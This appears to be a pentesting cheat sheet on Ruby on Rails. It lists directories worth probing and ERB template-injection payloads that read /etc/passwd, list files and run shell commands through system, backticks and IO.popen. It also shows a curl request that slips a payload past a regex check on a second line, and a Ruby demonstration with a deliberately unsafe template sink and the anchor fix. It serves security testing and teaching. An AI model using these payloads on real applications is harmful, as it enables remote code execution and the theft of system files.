Ruby on Rails Pentesting
Ruby on Rails is a web application framework written in Ruby.
- [Ruby_on_Rails_Cheat_Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html)
Common Directories
/assets/application.css
/config
/Gemfile
/Gemfile.lock
/rails/info
/rails/info/properties
/rails/info/routes
In addition, it is worth fuzzing paths under the /rails/ directory.
ERB Template Injection
If the target website renders user-controlled input through an ERB template, we can inject malicious template expressions into that page.
Payloads
Reference: Server Side Template Injection
<%= 2*3 %>
<%= self.methods %>
<%= self.method(:handle_POST).parameters %>
<!-- List files and directories -->
<%= Dir.entries('/') %>
<%= File.open('/etc/passwd').read %>
<!-- Code Execution -->
<%= system('cat /etc/passwd') %>
<%= `ls -la /` %>
<%= IO.popen('ls /').readlines() %>
Regex Check Bypass
Reference: https://davidhamann.de/2022/05/14/bypassing-regular-expression-checks/
We can also use the curl command if we want to send a payload that contains a newline.
Below is an example using the URL-encoded payload <%= IO.popen('ls /').readlines() %>, placed on a second line after a harmless value.
curl https://example.com/ -X POST -d 'abc
%3C%25%3D%20IO%2Epopen%28%27ls%20%2F%27%29%2Ereadlines%28%29%20%25%3E'
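The following is an added example, not code from the original page, showing why the newline in the curl body above matters: in Ruby, `^` and `$` match at line boundaries, so a validation like `/^[a-z]+$/` accepts a string whose first line is clean and whose second line carries an ERB expression, while `\A` and `\z` anchor to the whole string. The pattern, the `render_untrusted` sink and the sample input are constructed for this illustration and are not taken from any real application.

```ruby
require 'erb'

# Constructed sample: a parameter that is supposed to contain only lowercase letters.
WEAK_PATTERN   = /^[a-z]+$/     # line-anchored: bypassable with a newline
STRICT_PATTERN = /\A[a-z]+\z/   # string-anchored: the fix

def weak_valid?(value)
  !!(value =~ WEAK_PATTERN)
end

def strict_valid?(value)
  !!(value =~ STRICT_PATTERN)
end

# Hypothetical injection sink: untrusted input used as the template itself.
def render_untrusted(value)
  ERB.new(value).result(binding)
end

# Constructed input with the same shape as the curl body in the text above:
# a valid-looking first line, then an ERB expression on a second line.
SMUGGLED = "abc\n<%= 7*6 %>"

def demo
  {
    weak_accepts_smuggled:   weak_valid?(SMUGGLED),   # true: ^...$ only sees the "abc" line
    strict_accepts_smuggled: strict_valid?(SMUGGLED), # false: \A...\z spans the whole string
    both_accept_clean:       weak_valid?("abc") && strict_valid?("abc"),
    rendered:                render_untrusted(SMUGGLED) # "abc\n42": the expression ran
  }
end

if $PROGRAM_NAME == __FILE__
  demo.each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

Rails' own format validator (ActiveModel) raises an ArgumentError for patterns anchored with `^` or `$` unless `multiline: true` is passed, which is why hand-rolled checks outside the validator are the usual place this bug survives.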